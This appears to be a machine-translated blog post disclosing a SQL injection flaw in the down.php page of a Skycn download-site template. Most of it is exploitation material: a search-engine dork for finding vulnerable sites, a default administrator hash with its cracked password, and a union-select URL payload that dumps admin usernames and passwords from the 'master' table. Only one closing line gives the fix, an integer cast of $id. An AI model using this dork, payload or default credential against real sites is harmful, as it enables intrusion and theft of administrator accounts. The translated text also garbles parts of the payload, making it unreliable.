SQL Injection Vulnerability and solution for skycn Program

Sentiment blog

Skysky download site is a famous download site in China. It provides the latest free software and shared software downloads at home and abroad. China tietong, China Unicom, China Telecom, and information port all over the country have built download substations built with php + MySql. A considerable number of download substations use the same set of website creation templates, this website creation template has the SQL injection vulnerability.
Keywords: inurl: down. php

Vulnerability file: down. php

Down. php does not filter the get variable $ id. As a result, attackers can use SQL Injection statements to launch attacks. tests show that the default password of most administrators has not been changed, the default Administrator information is 1111_7363a304be1a682efaf10702fc7b97d8. to decrypt the password hash, the default password is sky! @ # Cn!

 

Injection and exploitation:

Keyword: Copyright & copy; 1998-2007 Skycn.com All Rights Reserved inurl: down. php

Http://site.com/down.php? Id = 1 + union + select + column_numbers + from + table_name

Column_numbers: not fixed, usually 50 +, or less than 40. For example, the Linyi information port test has 38 display spaces.

Table_name: the Administrator table segment is named master, and the field name is username and password.

Enter concat (username, 0x5f, password) in the Field 2 Software Title to display the administrator login password.

SQL EXP:

Http://download.site.com/down.php? Id = 47488 + and + 1 = 2 + union + select + 1, concat (username, 0x5f, password, 17,18, 19,20, 21,

22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42 + from + master

 

Security tips:

Solution: $ id = (int) $ _ GET [id];